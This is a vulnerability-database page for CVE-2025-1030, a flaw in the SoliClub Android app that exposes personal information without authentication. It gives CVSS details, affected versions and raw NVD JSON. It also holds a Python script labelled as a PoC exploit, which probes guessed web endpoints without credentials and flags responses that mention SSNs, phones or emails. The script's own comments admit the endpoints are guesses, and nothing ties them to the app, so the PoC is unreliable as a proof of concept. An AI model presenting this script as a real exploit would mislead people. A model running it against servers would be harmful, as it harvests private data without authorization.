Security Vulnerability Report
中文
CVE-2025-1030 CVSS 7.5 HIGH

CVE-2025-1030

Published: 2025-12-18 15:15:54
Last Modified: 2026-01-16 14:50:41

Description

Exposure of Private Personal Information to an Unauthorized Actor vulnerability in Utarit Informatics Services Inc. SoliClub allows Query System for Information.This issue affects SoliClub: from 5.2.4 before 5.3.7.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:utarit:soliclub:*:*:*:*:*:android:*:* - VULNERABLE
SoliClub 5.2.4 through 5.3.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-1030 PoC - SoliClub Information Disclosure # Target: SoliClub Query System for Information # Vulnerability: Unauthenticated access to sensitive personal information import requests import sys def check_vulnerability(target_url): """ Check if the target SoliClub instance is vulnerable to CVE-2025-1030 """ # Common query endpoints that might be affected endpoints = [ "/query/system/info", "/api/query/userinfo", "/soliclub/query/getInfo", "/QuerySystem/Information" ] headers = { "User-Agent": "Mozilla/5.0 (compatible; CVE-2025-1030-Scanner)", "Accept": "application/json, text/html" } print(f"[*] Testing target: {target_url}") print(f"[*] Checking for CVE-2025-1030 vulnerability...\n") for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: # Attempt unauthenticated request response = requests.get(url, headers=headers, timeout=10, verify=False) # Check for signs of information disclosure if response.status_code == 200: content_type = response.headers.get('Content-Type', '') # Check if response contains sensitive patterns sensitive_patterns = ['ssn', 'phone', 'email', 'address', 'personal', 'private'] response_text = response.text.lower() for pattern in sensitive_patterns: if pattern in response_text: print(f"[+] POTENTIALLY VULNERABLE: {url}") print(f"[+] Status: {response.status_code}") print(f"[+] Content-Type: {content_type}") print(f"[+] Detected sensitive data pattern: {pattern}") print(f"[+] Response length: {len(response.text)} bytes") return True except requests.exceptions.RequestException as e: print(f"[-] Error testing {url}: {str(e)}") print("[*] No obvious vulnerability indicators found.") print("[*] Manual verification recommended.") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-1030-poc.py <target_url>") print("Example: python cve-2025-1030-poc.py https://vulnerable-server.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-1030", "sourceIdentifier": "[email protected]", "published": "2025-12-18T15:15:53.520", "lastModified": "2026-01-16T14:50:40.903", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of Private Personal Information to an Unauthorized Actor vulnerability in Utarit Informatics Services Inc. SoliClub allows Query System for Information.This issue affects SoliClub: from 5.2.4 before 5.3.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-359"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:utarit:soliclub:*:*:*:*:*:android:*:*", "versionStartIncluding": "5.2.4", "versionEndExcluding": "5.3.7", "matchCriteriaId": "6BFA30F5-78F8-44B1-81DD-FB9264F9A1C6"}]}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0466", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}